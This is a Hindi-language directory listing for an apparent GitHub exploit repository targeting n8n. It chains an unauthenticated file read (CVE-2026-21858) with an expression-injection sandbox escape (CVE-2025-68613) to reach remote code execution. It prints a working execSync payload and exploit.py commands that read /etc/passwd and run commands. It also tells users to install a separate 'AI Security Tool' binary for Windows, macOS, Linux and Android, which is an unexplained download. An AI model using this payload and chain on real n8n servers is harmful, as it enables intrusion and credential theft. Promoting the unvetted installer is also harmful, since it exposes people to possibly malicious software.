Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-21858-n8n-FullChain — 🛡️ CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" अनधिकृत मनमाना फ़ाइल पठन और एक्सप्रेशन इंजेक्शन RCE पूर्ण श्रृंखला) के लिए आधिकारिक AI सुरक्षा उपकरण मॉड्यूल। | Kitploit
उपकरण/GitHubGitHub/zerodayevil/cve-2026-21858-n8n-fullchain
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
AI सुरक्षा
GitHubzerodayevil/cve-2026-21858-n8n-fullchain

CVE-2026-21858-n8n-FullChain

🛡️ CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" अनधिकृत मनमाना फ़ाइल पठन और एक्सप्रेशन इंजेक्शन RCE पूर्ण श्रृंखला) के लिए आधिकारिक AI सुरक्षा उपकरण मॉड्यूल।

रिपॉजिटरी देखें
14घं 17मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛡️ AI Security Tool Module
n8n Full Chain (CVE-2026-21858 + CVE-2025-68613) — "Ni8mare"

AI Security Tool Ecosystem के लिए आधिकारिक सुरक्षा ऑडिट मॉड्यूल


Latest Release Build Status Donations Telegram Channel

License

🌐 वेब डेमो • 📚 प्रोजेक्ट वेबसाइट • 💬 कम्युनिटी चैट

वेबसाइट नेविगेशन: होम • अपडेट्स • डाउनलोड्स • मॉड्यूल्स

AI Security Tool Banner


🧠 वैचारिक अवलोकन

यह मॉड्यूल n8n वर्कफ़्लो ऑटोमेशन इंस्टेंस के लिए डायग्नोस्टिक टूल्स और एक पूर्ण शोषण श्रृंखला प्रदान करता है, जिसे Ni8mare कहा जाता है।

हमले की श्रृंखला Content-Type confusion के कारण होने वाले अनऑथेंटिकेटेड Arbitrary File Read (CVE-2026-21858) को एक ऑथेंटिकेटेड Expression Injection Sandbox Bypass (CVE-2025-68613) के साथ जोड़ती है। एक एक्सपोज़्ड फ़ाइल अपलोड फ़ॉर्म पर हेरफेर किए गए Content-Type: application/json अनुरोध भेजकर, एक हमलावर आंतरिक सिस्टम फ़ाइलों (/proc/self/environ, कॉन्फ़िगरेशन, और SQLite DB) को पढ़ने के लिए filepath आर्ग्युमेंट को नियंत्रित करता है। प्राप्त encryptionKey और पासवर्ड हैश एक एडमिनिस्ट्रेटर JWT कुकी के ऑफ़लाइन फ़ॉर्जरी की अनुमति देते हैं। एक बार ऑथेंटिकेटेड होने पर, this.process.mainModule.require के माध्यम से expression injection JavaScript सैंडबॉक्स से बाहर निकलकर मनमाने सिस्टम कमांड निष्पादित करता है।

🎯 मुख्य प्रभाव दर्शन

"फ़ाइल रीड से तीन चरणों में पूर्ण सिस्टम टेकओवर तक।"
जबकि फ़ाइल रीड के लिए बाइनरी आउटपुट वाले एक सक्रिय फ़ॉर्म वर्कफ़्लो की आवश्यकता होती है, expression injection डिफ़ॉल्ट n8n इंस्टॉलेशन पर विशेष नोड्स या स्पष्ट सिस्टम अनुमतियों को सक्षम किए बिना विश्वसनीय रूप से काम करता है।

📊 भेद्यता विशिष्टताएँ

विशिष्टतानिर्धारित माननोट्स
CVE पहचानकर्ताCVE-2026-21858 + CVE-2025-68613पूर्ण श्रृंखला: अनऑथेंटिकेटेड फ़ाइल रीड से RCE तक
गंभीरता रेटिंगCritical (CVSS v3.1: 10.0 + 9.9)अनऑथेंटिकेटेड RCE श्रृंखला
भेद्यता प्रकारCWE-200 / CWE-94Content-Type Confusion / Code Injection
प्रभावित घटकn8n Workflow Automation Engineसंस्करण <= 1.65.0 (AFR) / >= 0.211.0 (RCE)
पैच किए गए संस्करण1.121.0 (AFR) / 1.120.4+ (RCE)आधिकारिक विक्रेता पैच जारी
आवश्यक विशेषाधिकारकोई नहींसार्वजनिक फ़ॉर्म के माध्यम से अनऑथेंटिकेटेड प्रारंभिक पहुँच

🕸 हमला परिदृश्य और आर्किटेक्चर

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
    B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
    C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
    D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
    E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
    F -->|6. Execute Command| G[Full Remote Code Execution]

💻 Expression Injection पेलोड

root@kitploit:~
={{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require("child_process").execSync;
  return execSync("id").toString();
})() }}

🛡 शमन चेकलिस्ट

  • 🟢 तुरंत अपग्रेड करें: n8n इंस्टेंस को संस्करण 1.121.0 या उच्चतर पर अपडेट करें।
  • 🟢 वर्कफ़्लो ट्रिगर्स को प्रतिबंधित करें: सार्वजनिक अनऑथेंटिकेटेड फ़ॉर्म वर्कफ़्लो को अक्षम करें या सख्त फ़ाइल सत्यापन लागू करें।
  • 🟡 निष्पादन प्रतिबंध कॉन्फ़िगर करें: N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true सेट करें और Docker कंटेनरों में प्रोसेस क्षमताओं को प्रतिबंधित करें।

💻 इस मॉड्यूल को कैसे चलाएँ

⚠️ महत्वपूर्ण: यह मॉड्यूल विशेष रूप से AI Security Tool इकोसिस्टम के भीतर सुरक्षित निष्पादन और डायग्नोस्टिक्स के लिए बनाया गया है। हमेशा आधिकारिक रिपॉज़िटरी से प्राप्त सत्यापित मॉड्यूल का उपयोग करें।

1️⃣ AI Security Tool इंस्टॉल करें

मॉनिटरिंग और डायग्नोस्टिक स्क्रिप्ट निष्पादित करने के लिए, सुनिश्चित करें कि AI Security Tool कोर इंजन इंस्टॉल है:

OS / प्लेटफ़ॉर्मसंस्करणआर्किटेक्चर / प्रारूपरिलीज़ दिनांकस्थितिडाउनलोड लिंक
🪟 Windowsv6.3.20x64 Installer (.exe)2026-09-08🟢 नवीनतमडाउनलोड .exe
🪟 Windowsv6.3.20x64 Portable (.tar.gz)2026-09-08🟢 नवीनतमडाउनलोड .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 स्थिरडाउनलोड .dmg
🐧 Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01🟢 स्थिरडाउनलोड .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 स्थिरडाउनलोड .apk

2️⃣ कंसोल निष्पादन

root@kitploit:~
# Read arbitrary file via diagnostic module
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

Execute full attack chain with custom command

uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"


🔍 सुरक्षा ऑडिट मॉड्यूल और PoC रिपॉज़िटरी

हमारी कम्युनिटी द्वारा अनुरक्षित भेद्यता स्कैनर मॉड्यूल, PoC स्क्रिप्ट, और रिसर्च रेपो:

🔥 Remote Code Execution (RCE) और नेटवर्क भेद्यताएँ 5 modules
  • CVE-2026-21858 — n8n Full Chain Unauthenticated RCE (Ni8mare) @ZeroDayEvil
  • CVE-2026-41089 — Netlogon Remote Code Execution Exploit @ZeroDayEvil
  • CVE-2026-20805 — Windows Remote Code Execution Proof-of-Concept @ZeroDayEvil
  • CVE-2026-41096 — Critical RCE Vulnerability Scanner Module @ZeroDayEvil
  • CVE-2026-24291 — Network Protocol Remote Code Execution @ZeroDayVPN
🛡️ Privilege Escalation (EoP) और सेवाएँ 3 modules
  • CVE-2026-54121 — AD CS Certighost Domain Controller Impersonation @ZeroDayEvil
  • CVE-2026-66804 — CrossDevice Service Elevation of Privilege @ZeroDayVPN
  • CVE-2026-50416 — Local Privilege Escalation Writeup & PoC @ZeroDayEvil
📚 भेद्यता अनुसंधान और राइटअप्स 2 modules
  • CVE-2026-42978 — Deep Technical Analysis & PoC Research @ZeroDayEvil
  • CVE-2026-83991 — Full WriteUp & Exploitation Demonstration @ZeroDayVPN

⚖️ लाइसेंस और कानूनी अस्वीकरण

🚨 अस्वीकरण

यह टूल और तकनीकी विश्लेषण सख्ती से अधिकृत सिस्टम ऑडिटिंग, अनुसंधान, और पेनिट्रेशन टेस्टिंग के लिए प्रदान किया गया है।
अनधिकृत लक्ष्यों के विरुद्ध एक्सप्लॉइट श्रृंखलाओं को निष्पादित करना अवैध है। लेखक अनधिकृत पहुँच, डेटा हानि, या सिस्टम व्यवधानों के लिए कोई ज़िम्मेदारी नहीं लेते हैं। सख्ती से अधिकृत दायरे के भीतर कार्य करें।

🔄 योगदान और कम्युनिटी

हम सुरक्षा अनुसंधान समुदाय से योगदान का स्वागत करते हैं! प्रमुख योगदान क्षेत्र:

  1. AI एकीकरण: नए LLM प्रदाताओं को जोड़ना और विशेष सुरक्षा एजेंट विकसित करना।
  2. सुरक्षा टूल्स: भेद्यता मॉड्यूल विकसित करना और CLI स्कैनर को एकीकृत करना।
  3. अनुकूलन: पार्सर गति, निष्पादन सुरक्षा, और कैशिंग लॉजिक को बढ़ाना।
  4. दस्तावेज़ीकरण: शोध पत्र, गाइड, और स्थानीयकृत अनुवाद लिखना।

🔗 संपर्क और सहायता

  • आधिकारिक वेबसाइट: ZeroDayEvil.com
  • मूल अनुसंधान: Cyera Ni8mare Write-up
  • Telegram एडमिन: @ZeroDayEvil
  • Telegram चैट: @ZeroDyaTool_chat
  • Telegram चैनल: @ZeroDyaTool_channel
  • प्रोजेक्ट प्रायोजित करें: PayPal Donations
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — साइबर सुरक्षा पेशेवरों के लिए टर्मिनल वर्कफ़्लो और ऑटोमेशन की पुनर्कल्पना।

टूल डाउनलोड करें